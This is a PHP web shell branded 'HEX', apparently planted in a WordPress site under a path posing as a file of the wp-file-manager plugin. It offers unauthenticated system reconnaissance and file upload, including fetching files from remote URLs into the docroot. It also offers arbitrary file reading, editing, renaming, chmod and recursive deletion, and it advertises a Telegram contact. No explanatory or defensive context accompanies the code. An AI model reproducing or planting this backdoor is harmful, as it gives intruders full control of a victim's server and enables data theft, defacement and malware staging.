File: /var/www/clients/client1/web78/web/wp-content/plugins/wp-file-manager/file_folder_manager.php
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>HEX</title>
    <link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet">
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        body {
            font-family: 'JetBrains Mono', monospace;
            background: #0d1117;
            color: #c9d1d9;
            line-height: 1.6;
            font-size: 14px;
            min-height: 100vh;
            padding: 20px;
        }
        .container {
            max-width: 1000px;
            margin: 0 auto;
        }
        /* Header */
        .header {
            background: #161b22;
            border: 1px solid #21262d;
            border-radius: 6px;
            padding: 16px;
            margin-bottom: 16px;
        }
        .title {
            font-size: 18px;
            font-weight: 500;
            color: #58a6ff;
            margin-bottom: 12px;
        }
        .system-info {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));
            gap: 8px;
            font-size: 12px;
        }
        .info-line {
            padding: 4px 0;
        }
        .info-label {
            color: #7d8590;
            display: inline-block;
            width: 120px;
        }
        .info-value {
            color: #f0883e;
        }
        /* Breadcrumb */
        .breadcrumb {
            background: #0d1117;
            border: 1px solid #21262d;
            border-radius: 6px;
            padding: 12px;
            margin-bottom: 16px;
            font-size: 13px;
        }
        .breadcrumb a {
            color: #58a6ff;
            text-decoration: none;
        }
        .breadcrumb a:hover {
            text-decoration: underline;
        }
        /* Upload Section */
        .upload-section {
            background: #161b22;
            border: 1px solid #21262d;
            border-radius: 6px;
            padding: 16px;
            margin-bottom: 16px;
        }
        .section-title {
            font-size: 14px;
            font-weight: 500;
            color: #f0f6fc;
            margin-bottom: 12px;
        }
        .form-row {
            margin-bottom: 12px;
        }
        .radio-group {
            display: flex;
            gap: 20px;
            margin-bottom: 12px;
        }
        .radio-item {
            display: flex;
            align-items: center;
            gap: 6px;
            font-size: 13px;
        }
        .radio-item input[type="radio"] {
            margin: 0;
        }
        input[type="file"],
        input[type="text"],
        select,
        textarea {
            background: #0d1117;
            border: 1px solid #21262d;
            border-radius: 6px;
            color: #c9d1d9;
            padding: 8px 12px;
            font-family: inherit;
            font-size: 13px;
        }
        input[type="file"]:focus,
        input[type="text"]:focus,
        select:focus,
        textarea:focus {
            outline: none;
            border-color: #58a6ff;
        }
        .btn {
            background: #21262d;
            border: 1px solid #30363d;
            border-radius: 6px;
            color: #f0f6fc;
            padding: 6px 12px;
            font-family: inherit;
            font-size: 13px;
            cursor: pointer;
            transition: all 0.2s;
        }
        .btn:hover {
            background: #30363d;
            border-color: #8b949e;
        }
        .btn-primary {
            background: #238636;
            border-color: #238636;
        }
        .btn-primary:hover {
            background: #2ea043;
        }
        .btn-danger {
            background: #da3633;
            border-color: #da3633;
        }
        .btn-danger:hover {
            background: #f85149;
        }
        .upload-row {
            display: flex;
            gap: 8px;
            align-items: end;
        }
        .upload-row input[type="file"],
        .upload-row input[type="text"] {
            flex: 1;
        }
        .upload-row input[type="text"]:last-of-type {
            max-width: 150px;
        }
        /* Messages */
        .message {
            padding: 12px;
            border-radius: 6px;
            margin: 12px 0;
            font-size: 13px;
        }
        .message-success {
            background: rgba(35, 134, 54, 0.15);
            border: 1px solid #238636;
            color: #56d364;
        }
        .message-error {
            background: rgba(218, 54, 51, 0.15);
            border: 1px solid #da3633;
            color: #f85149;
        }
        /* Table */
        .file-table {
            background: #0d1117;
            border: 1px solid #21262d;
            border-radius: 6px;
            overflow: hidden;
            margin-bottom: 20px;
        }
        table {
            width: 100%;
            border-collapse: collapse;
        }
        th {
            background: #161b22;
            padding: 12px;
            text-align: left;
            font-weight: 500;
            font-size: 13px;
            color: #f0f6fc;
            border-bottom: 1px solid #21262d;
        }
        td {
            padding: 8px 12px;
            border-bottom: 1px solid #21262d;
            font-size: 13px;
        }
        tr:hover {
            background: #161b22;
        }
        .file-link {
            color: #c9d1d9;
            text-decoration: none;
        }
        .file-link:hover {
            color: #58a6ff;
        }
        .dir-link {
            color: #58a6ff;
        }
        .size {
            color: #7d8590;
            text-align: right;
        }
        .permissions {
            font-family: 'JetBrains Mono', monospace;
            font-size: 12px;
            color: #7d8590;
        }
        .writable { color: #56d364; }
        .readonly { color: #f85149; }
        /* Action Form */
        .action-form {
            display: flex;
            gap: 4px;
            align-items: center;
        }
        .action-form select {
            font-size: 12px;
            padding: 4px 8px;
            min-width: 80px;
        }
        .action-form .btn {
            padding: 4px 8px;
            font-size: 12px;
        }
        /* Edit Form */
        .edit-form {
            background: #161b22;
            border: 1px solid #21262d;
            border-radius: 6px;
            padding: 16px;
            margin: 16px 0;
        }
        .edit-form textarea {
            width: 100%;
            min-height: 400px;
            resize: vertical;
        }
        .edit-form .form-row {
            margin-top: 12px;
        }
        /* File Preview */
        .file-preview {
            background: #0d1117;
            border: 1px solid #21262d;
            border-radius: 6px;
            padding: 16px;
            margin: 16px 0;
        }
        .file-preview pre {
            background: #161b22;
            border: 1px solid #21262d;
            border-radius: 6px;
            padding: 16px;
            overflow-x: auto;
            font-size: 12px;
            line-height: 1.45;
        }
        /* Footer */
        .footer {
            text-align: center;
            margin-top: 40px;
            padding: 20px;
        }
        .telegram-link {
            display: inline-flex;
            align-items: center;
            gap: 8px;
            background: #0088cc;
            color: white;
            text-decoration: none;
            padding: 10px 20px;
            border-radius: 6px;
            font-size: 14px;
            font-weight: 500;
            transition: background 0.2s;
        }
        .telegram-link:hover {
            background: #0099dd;
        }
        /* Responsive */
        @media (max-width: 768px) {
            .container { padding: 10px; }
            .system-info { grid-template-columns: 1fr; }
            .upload-row { flex-direction: column; }
            .upload-row input[type="text"]:last-of-type { max-width: none; }
            table { font-size: 12px; }
            th, td { padding: 6px 8px; }
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <div class="title">HEX</div>
            
            <?php
            set_time_limit(0);
            error_reporting(0);
            $disfunc = @ini_get("disable_functions");
            if (empty($disfunc)) {
                $disf = "<span class='writable'>NONE</span>";
            } else {
                $disf = "<span class='readonly'>".$disfunc."</span>";
            }
            function author() {
                echo '<div class="footer">
                        <a href="https://t.me/HEX80" class="telegram-link" target="_blank">
                            <span>@</span>
                            <span>Telegram</span>
                        </a>
                      </div>';
                exit();
            }
            function cekdir() {
                if (isset($_GET['path'])) {
                    $lokasi = $_GET['path'];
                } else {
                    $lokasi = getcwd();
                }
                if (is_writable($lokasi)) {
                    return "<span class='writable'>writable</span>";
                } else {
                    return "<span class='readonly'>readonly</span>";
                }
            }
            function cekroot() {
                if (is_writable($_SERVER['DOCUMENT_ROOT'])) {
                    return "<span class='writable'>writable</span>";
                } else {
                    return "<span class='readonly'>readonly</span>";
                }
            }
            function xrmdir($dir) {
                $items = scandir($dir);
                foreach ($items as $item) {
                    if ($item === '.' || $item === '..') {
                        continue;
                    }
                    $path = $dir.'/'.$item;
                    if (is_dir($path)) {
                        xrmdir($path);
                    } else {
                        unlink($path);
                    }
                }
                rmdir($dir);
            }
            function green($text) {
                echo "<div class='message message-success'>".$text."</div>";
            }
            function red($text) {
                echo "<div class='message message-error'>".$text."</div>";
            }
            ?>
            <div class="system-info">
                <div class="info-line">
                    <span class="info-label">Server:</span>
                    <span class="info-value"><?php echo $_SERVER['SERVER_SOFTWARE']; ?></span>
                </div>
                <div class="info-line">
                    <span class="info-label">System:</span>
                    <span class="info-value"><?php echo php_uname(); ?></span>
                </div>
                <div class="info-line">
                    <span class="info-label">User:</span>
                    <span class="info-value"><?php echo @get_current_user()." (".@getmyuid().")"; ?></span>
                </div>
                <div class="info-line">
                    <span class="info-label">PHP:</span>
                    <span class="info-value"><?php echo @phpversion(); ?></span>
                </div>
                <div class="info-line" style="grid-column: 1 / -1;">
                    <span class="info-label">Disabled:</span>
                    <span class="info-value"><?php echo $disf; ?></span>
                </div>
            </div>
        </div>
        <div class="breadcrumb">
            <?php
            foreach($_POST as $key => $value){
                $_POST[$key] = stripslashes($value);
            }
            if(isset($_GET['path'])){
                $lokasi = $_GET['path'];
                $lokdua = $_GET['path'];
            } else {
                $lokasi = getcwd();
                $lokdua = getcwd();
            }
            $lokasi = str_replace('\\','/',$lokasi);
            $lokasis = explode('/',$lokasi);
            $lokasinya = @scandir($lokasi);
            echo "$ pwd: ";
            foreach($lokasis as $id => $lok){
                if($lok == '' && $id == 0){
                    $a = true;
                    echo '<a href="?path=/">/</a>';
                    continue;
                }
                if($lok == '') continue;
                echo '<a href="?path=';
                for($i=0;$i<=$id;$i++){
                    echo "$lokasis[$i]";
                    if($i != $id) echo "/";
                } 
                echo '">'.$lok.'</a>/';
            }
            ?>
        </div>
        <div class="upload-section">
            <div class="section-title">Upload Files</div>
            <?php
            if (isset($_POST['upwkwk'])) {
                if (isset($_POST['berkasnya'])) {
                    if ($_POST['dirnya'] == "2") {
                        $lokasi = $_SERVER['DOCUMENT_ROOT'];
                    }
                    $data = @file_put_contents($lokasi."/".$_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name']));
                    if (file_exists($lokasi."/".$_FILES['berkas']['name'])) {
                        green("File uploaded: ".$lokasi."/".$_FILES['berkas']['name']);
                    } else {
                        red("Upload failed");
                    }
                } elseif (isset($_POST['linknya'])) {
                    if (empty($_POST['namalink'])) {
                        red("Filename cannot be empty");
                    } else {
                        if ($_POST['dirnya'] == "2") {
                            $lokasi = $_SERVER['DOCUMENT_ROOT'];
                        }
                        $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink']));
                        if (file_exists($lokasi."/".$_POST['namalink'])) {
                            green("File uploaded: ".$lokasi."/".$_POST['namalink']);
                        } else {
                            red("Upload failed");
                        }
                    }
                }
            }
            ?>
            <form enctype="multipart/form-data" method="post">
                <div class="form-row">
                    <div class="radio-group">
                        <label class="radio-item">
                            <input type="radio" value="1" name="dirnya" checked>
                            <span>current [<?php echo cekdir(); ?>]</span>
                        </label>
                        <label class="radio-item">
                            <input type="radio" value="2" name="dirnya">
                            <span>docroot [<?php echo cekroot(); ?>]</span>
                        </label>
                    </div>
                </div>
                <input type="hidden" name="upwkwk" value="aplod">
                
                <div class="form-row">
                    <div class="upload-row">
                        <input type="file" name="berkas">
                        <button type="submit" name="berkasnya" class="btn btn-primary">Upload</button>
                    </div>
                </div>
                <div class="form-row">
                    <div class="upload-row">
                        <input type="text" name="darilink" placeholder="https://example.com/file.txt">
                        <input type="text" name="namalink" placeholder="filename">
                        <button type="submit" name="linknya" class="btn btn-primary">Fetch</button>
                    </div>
                </div>
            </form>
        </div>
        <?php
        if (isset($_GET['fileloc'])) {
            echo "<div class='file-preview'>";
            echo "<div class='section-title'>File: ".$_GET['fileloc']."</div>";
            echo "<pre>".htmlspecialchars(file_get_contents($_GET['fileloc']))."</pre>";
            echo "</div>";
            author();
        } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") {
            if (is_dir($_POST['path'])) {
                xrmdir($_POST['path']);
                if (file_exists($_POST['path'])) {
                    red("Failed to delete directory");
                } else {
                    green("Directory deleted");
                }
            } elseif (is_file($_POST['path'])) {
                @unlink($_POST['path']);
                if (file_exists($_POST['path'])) {
                    red("Failed to delete file");
                } else {
                    green("File deleted");
                }
            }
        } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") {
            echo "<div class='edit-form'>";
            echo "<div class='section-title'>chmod ".$_POST['path']."</div>";
            echo '<form method="post">
            <div class="form-row">
                <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" placeholder="0644" />
                <input type="hidden" name="path" value="'.$_POST['path'].'">
                <input type="hidden" name="pilih" value="ubahmod">
                <button type="submit" name="chm0d" class="btn btn-primary">Apply</button>
            </div>
            </form>';
            if (isset($_POST['chm0d'])) {
                $cm = @chmod($_POST['path'], $_POST['perm']);
                if ($cm == true) {
                    green("Permission changed");
                } else {
                    red("Permission change failed");
                }
            }
            echo "</div>";
        } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") {
            if (isset($_POST['gantin'])) {
                $ren = @rename($_POST['path'], $_POST['newname']);
                if ($ren == true) {
                    green("Renamed successfully");
                } else {
                    red("Rename failed");
                }
            }
            if (empty($_POST['name'])) {
                $namaawal = $_POST['newname'];
            } else {
                $namawal = $_POST['name'];
            }
            echo "<div class='edit-form'>";
            echo "<div class='section-title'>mv ".$_POST['path']."</div>";
            echo '<form method="post">
            <div class="form-row">
                <input name="newname" type="text" value="'.$namaawal.'" placeholder="new name" />
                <input type="hidden" name="path" value="'.$_POST['path'].'">
                <input type="hidden" name="pilih" value="gantinama">
                <button type="submit" name="gantin" class="btn btn-primary">Rename</button>
            </div>
            </form>';
            echo "</div>";
        } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") {
            if (isset($_POST['gasedit'])) {
                $edit = @file_put_contents($_POST['path'], $_POST['src']);
                if ($edit == true) {
                    green("File saved");
                } else {
                    red("Save failed");
                }
            }
            echo "<div class='edit-form'>";
            echo "<div class='section-title'>nano ".$_POST['path']."</div>";
            echo '<form method="post">
            <textarea name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea>
            <div class="form-row">
                <input type="hidden" name="path" value="'.$_POST['path'].'">
                <input type="hidden" name="pilih" value="edit">
                <button type="submit" name="gasedit" class="btn btn-primary">Save</button>
            </div>
            </form>';
            echo "</div>";
        }
        ?>
        <div class="file-table">
            <table>
                <thead>
                    <tr>
                        <th>Name</th>
                        <th style="width: 80px;">Size</th>
                        <th style="width: 100px;">Permissions</th>
                        <th style="width: 120px;">Actions</th>
                    </tr>
                </thead>
                <tbody>
                    <?php
                    foreach($lokasinya as $dir){
                        if(!is_dir($lokasi."/".$dir) || $dir == '.' || $dir == '..') continue;
                        echo "<tr>
                        <td>
                            <a href=\"?path=".$lokasi."/".$dir."\" class='file-link dir-link'>
                                ð ".$dir."
                            </a>
                        </td>
                        <td class='size'>--</td>
                        <td class='permissions ";
                        if(is_writable($lokasi."/".$dir)) echo 'writable';
                        elseif(!is_readable($lokasi."/".$dir)) echo 'readonly';
                        echo "'>".statusnya($lokasi."/".$dir)."</td>
                        <td>
                            <form method='POST' action='?pilihan&path=$lokasi' class='action-form'>
                                <select name='pilih'>
                                    <option value=''>--</option>
                                    <option value='hapus'>rm</option>
                                    <option value='ubahmod'>chmod</option>
                                    <option value='gantinama'>mv</option>
                                </select>
                                <input type='hidden' name='type' value='dir'>
                                <input type='hidden' name='name' value='$dir'>
                                <input type='hidden' name='path' value='$lokasi/$dir'>
                                <button type='submit' class='btn'>go</button>
                            </form>
                        </td>
                        </tr>";
                    }
                    foreach($lokasinya as $file) {
                        if(!is_file("$lokasi/$file")) continue;
                        $size = filesize("$lokasi/$file")/1024;
                        $size = round($size,3);
                        if($size >= 1024){
                            $size = round($size/1024,2).'M';
                        } else {
                            $size = $size.'K';
                        }
                        echo "<tr>
                        <td>
                            <a href=\"?fileloc=$lokasi/$file&path=$lokasi\" class='file-link'>
                                ð $file
                            </a>
                        </td>
                        <td class='size'>".$size."</td>
                        <td class='permissions ";
                        if(is_writable("$lokasi/$file")) echo 'writable';
                        elseif(!is_readable("$lokasi/$file")) echo 'readonly';
                        echo "'>".statusnya("$lokasi/$file")."</td>
                        <td>
                            <form method='post' action='?pilihan&path=$lokasi' class='action-form'>
                                <select name='pilih'>
                                    <option value=''>--</option>
                                    <option value='hapus'>rm</option>
                                    <option value='ubahmod'>chmod</option>
                                    <option value='gantinama'>mv</option>
                                    <option value='edit'>nano</option>
                                </select>
                                <input type='hidden' name='type' value='file'>
                                <input type='hidden' name='name' value='$file'>
                                <input type='hidden' name='path' value='$lokasi/$file'>
                                <button type='submit' class='btn'>go</button>
                            </form>
                        </td>
                        </tr>";
                    }
                    ?>
                </tbody>
            </table>
        </div>
        <?php
        author();
        function statusnya($file){
            $statusnya = fileperms($file);
            if (($statusnya & 0xC000) == 0xC000) {
                $ingfo = 's';
            } elseif (($statusnya & 0xA000) == 0xA000) {
                $ingfo = 'l';
            } elseif (($statusnya & 0x8000) == 0x8000) {
                $ingfo = '-';
            } elseif (($statusnya & 0x6000) == 0x6000) {
                $ingfo = 'b';
            } elseif (($statusnya & 0x4000) == 0x4000) {
                $ingfo = 'd';
            } elseif (($statusnya & 0x2000) == 0x2000) {
                $ingfo = 'c';
            } elseif (($statusnya & 0x1000) == 0x1000) {
                $ingfo = 'p';
            } else {
                $ingfo = 'u';
            }
            $ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
            $ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
            $ingfo .= (($statusnya & 0x0040) ?
                (($statusnya & 0x0800) ? 's' : 'x' ) :
                (($statusnya & 0x0800) ? 'S' : '-'));
            $ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
            $ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
            $ingfo .= (($statusnya & 0x0008) ?
                (($statusnya & 0x0400) ? 's' : 'x' ) :
                (($statusnya & 0x0400) ? 'S' : '-'));
            $ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
            $ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
            $ingfo .= (($statusnya & 0x0001) ?
                (($statusnya & 0x0200) ? 't' : 'x' ) :
                (($statusnya & 0x0200) ? 'T' : '-'));
            return $ingfo;
        }
        ?>
    </div>
</body>
</html>